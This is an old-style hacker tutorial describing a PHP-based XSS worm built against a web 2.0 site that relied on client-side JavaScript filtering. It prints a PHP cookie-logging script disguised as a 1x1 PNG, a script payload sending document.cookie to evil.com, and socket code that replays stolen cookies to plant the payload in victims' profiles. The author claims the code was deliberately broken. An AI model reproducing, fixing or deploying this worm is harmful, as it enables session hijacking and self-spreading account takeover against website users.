PHP XSS Worm

If you find the formatting of this article to be off, please wget
picobsd.amdwebhost.com/~cfc/xss.txt

Before anyone flames me, the code in this article is purposefully
flawed. It will not work. A programmer should be able to get it to
work in a matter of minutes. I removed some code and modified other
stuff so that skiddies don't pick it up. This article is meant for
understanding, not as a contribution of code.

A while back, I was poking around a web 2.0 site. I noticed something
rather interesting: every single prefernce for users had it's own file.
This was probably done because the site, which was AJAX based, modified
user information via AJAX, and therefore often times there was only one
value being edited at a time. I started poking around these, and I
found out early on that all data sanitation was done with Javascript.
I'm assuming this is because the developer was more comfortable with
javascript, and didn't use PHP for anything except what he had to
(editing database fields, etc.) Because filtering was done via
javascript, I figured it wasn't done on the PHP side (I was correct), so
if I could access the file directly, I was in buisness.

It worked. site.com/users_neighborhood.php was accessable, and when I
edited my neighborhood, I was able to insert a cookie stealer. The
cookie stealer employed my favorite concept, albeit not always possible:
the image. Which brings me to my first segment of code, the cookie
stealer itself:
<?php
$data = $_GET['data']; #get the cookie

#create image
header("Content-type: image/png"); #this is a PNG file
$image = imagecreate(1,1); #create a 1x1 image
imagecolorallocate(1,1,1); #set BG to white
imagepng($image); #display the image
imagedestroy($image); #delete image from temp memory

#store cookie
$fp = fopen("misc.html","r"); #open log file and append it
fputs($fp, $data."<br>"); #add the data
fclose($fp); #close file
?>

This code simply created a PNG image and set the file's output
content-type to PNG.

And the Javascript looked like this:
<script>document.write("<img src='http://evil.com/image.php?data="
document.cookie "'>");</script>

So, easy part down. Next is the propagation technique. I had a PHP
program, and it contains a variable with the entire cookie in it. So
the obvious thing to do at this point was to use sockets to connect to
our target site's users_neighborhood.php page with the hijacked cookie.
I did this by opening a socket and passing data to it. Here's the code:
<?PHP
#Connect Data
$host = "site.com"; #URL
$page = "/users_neighborhood.php"; #page
$agent = "BorgBrowser"; #user agent, used to specify the
browser/program (googlebot, mozilla firefox, etc.)
$cookie = $data; #The cookie from above
$xss =
"%3Cscript%3Edocument.write%28%22%3Cimg%20src%3D%27http%3A//evil.com/image.php%3Fdata%3D%22+document.cookie+%22%27%3E%22%29%3B%3C/script%3E";
#A URL encoded version of the XSS attack
$attack = "neighborhood=".$xss; #POST data with the XSS attack
in it.
?>

This section of code just set up all the variables used later.

<?php
#Make Packet
function makePacket($host, $page, $agent, $rnum, $cookie, $data)
{
#Generate the packet
$packet = "POST ".$page." HTTP/1.1
";
#POST to the users_neighborhood page
$packet .= "Host: ".$host."
";
#specify the host
$packet .= "User-Agent: ".$agent."
";
#specify the user agent
$packet .= "Content-type: application/x-www-form-urlencoded
"; #the
content type
$packet .= "Content-length: ".strlen($data)."
"; #the
content length, found by str_len, which finds the length of a variable
$packet .= "Set-Cookie: ".$cookie."
";
#And, set the cookie
$packet .= $attack; #and
finally, our payload

#return packet
return $packet;
#return the packet
}
?>

This section is a function which allows us to create a valid HTTP/1.1
packet with POST data and cookie data in it.

<?php
#open network connection
$port = getservbyname('www', 'tcp'); #get the
TCP port the WWW service uses
$addr = gethostbyname($host); #get the
address of our host, as defined above
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); #create a
socket
$result = socket_connect($socket, $addr, $port); #connect
to the host on the WWW's port
?>

this section created our network connection to the site

<?php
#Send Data
$in = makePacket($host, $page, $agent, $rnum, $cookie, $data); #Get the
output of the makePacket function created above
socket_write($socket, $in, strlen($in)); #write
to the socket the packet

#close network connection
socket_close($socket); #Close
the socket connection
?>

This section of code wrote the HTTP packet to the site



What we have done is used the XSS exploit in the site steal to cookie.
Our cookie stealer script not only logs cookies, but it is also used to
authenticate us as that user and grant us the ability to edit THEIR
content, and steal cookies using their page as well.


LEGAL STUFF/DISCLAIMER: THE CODE IN THIS TUTORIAL WAS EDITED TO ENSURE
THAT IS DOES NOT WORK PROPERLY. THIS WAS DONE ON PURPOSE TO AVOID THE
USE OF THIS CODE FOR ILLEGITIMATE PURPOSES. THE CODE IS FOR POC
PURPOSES ONLY, MEANT OT DEMONSTRATE THE EXTENSION OF XSS HOLES. DON'T
DO BAD STUFF, CAUSE IT'S NOT ON ME IF YOU DO. THIS WORM WAS CREATED AND
TESTED IN A CONTROLLED ENVIRONMENT.